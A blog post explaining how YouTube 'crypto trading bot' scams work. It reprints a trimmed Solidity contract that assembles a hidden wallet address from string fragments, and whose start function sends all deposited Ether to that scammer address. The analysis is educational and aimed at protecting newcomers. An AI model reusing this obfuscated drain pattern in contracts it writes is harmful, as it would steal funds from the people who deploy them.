Decompile YouTube Crypto Scams

You’ve probably seen videos with titles like “Making A Bot $3800/Day with ChatGPT | Simple Copy-Paste Method,” where someone excitedly claims you can get rich in a day. Sounds like a scam, right? That’s because it is a scam. There are plenty of articles about these scams, but now I’ll show you how they actually work behind the scenes.

Someone clicks on the crypto button

First, you need to copy a contract from the description into the Remix IDE, compile it, and deploy it. I won’t link any of them here because they’ll likely be removed due to being scams, and I don’t want to provide dead links. The next step is to top up the contract with some Ether and run the start function. That’s where the fun begins.

I’ve trimmed the code to show only the relevant parts and reordered the functions so we can see the sections related to the address:

pragma solidity ^0.6.6;

contract OneinchSlippageBot {
    constructor() public {}

    receive() external payable {}

    function startExploration(string memory _a) internal pure returns (address _parsedAddress) {
        // bullshit
    }

    function getMempoolShort() private pure returns (string memory) {
        return "0xB3c";
    }

    function fetchMempoolEdition() private pure returns (string memory) {
        return "749CC5F";
    }

    function fetchMempoolVersion() private pure returns (string memory) {
        return "60CB7";   
    }

    function getMempoolLong() private pure returns (string memory) {
        return "cE7419";
    }

    function getMempoolHeight() private pure returns (string memory) {
        return "d2dF0f";
    }

    function getMempoolCode() private pure returns (string memory) {
        return "e5d9";
    }

    function getMempoolStart() private pure returns (string memory) {
        return "d7EE"; 
    }

    function getMempoolLog() private pure returns (string memory) {
        return "E6641";
    }

    function fetchMempoolData() public pure returns (string memory) {
        string memory _mempoolShort = getMempoolShort();
        string memory _mempoolEdition = fetchMempoolEdition();
        string memory _mempoolVersion = fetchMempoolVersion();
        string memory _mempoolLong = getMempoolLong();
        string memory _getMempoolHeight = getMempoolHeight();
        string memory _getMempoolCode = getMempoolCode();
        string memory _getMempoolStart = getMempoolStart();
        string memory _getMempoolLog = getMempoolLog();

        return string(abi.encodePacked(_mempoolShort, _mempoolEdition, _mempoolVersion, 
            _mempoolLong, _getMempoolHeight,_getMempoolCode,_getMempoolStart,_getMempoolLog));
    }

    function getBa() private view returns(uint) {
        return address(this).balance;
    }
    
    function start() public payable {
        address to = startExploration(fetchMempoolData());
        address payable contracts = payable(to);
        contracts.transfer(getBa());
    }
    
    function withdrawal() public payable {
        address to = startExploration((fetchMempoolData()));
        address payable contracts = payable(to);
        contracts.transfer(getBa());
    }
}

The fetchMempoolData function calls the other functions and "silently" builds the address. After that, the startExploration function performs some operations, which aren’t relevant, but it returns the address. The next line type-asserts the address as payable, because only the payable type has a transfer function on the address.

The address 0xB3c749CC5F60CB7cE7419d2dF0fe5d9d7EEE6641 acts as the destination, which means that the contract transfers all the funds from the contract to this address, as seen in Etherscan’s internal transactions.

For example, in this contract, the victim topped up with 0.739 Ether. After two days of hesitation and struggle, he finally called the start function and lost all of his funds.

The scammer’s address, once it collected enough tokens, sent them through a few other addresses and finally hit the KuCoin exchange. They may have attempted to off-ramp the amount there, but I can’t confirm if this was successful since I don’t have access to KuCoin’s internal systems. Example attempt.

Conclusion

As a newcomer, it is hard to evaluate these scams because you only hear about success stories, so you believe that there is someone who can show you the golden ticket to paradise. That’s why it’s important to make the Web3 space even more secure. This can be done through education or, even better, by developing tools that help newcomers recognize scammers.

Follow me if you want more content like this. My main areas are technical advice for startups and helping communities evolve in the new era of decentralization.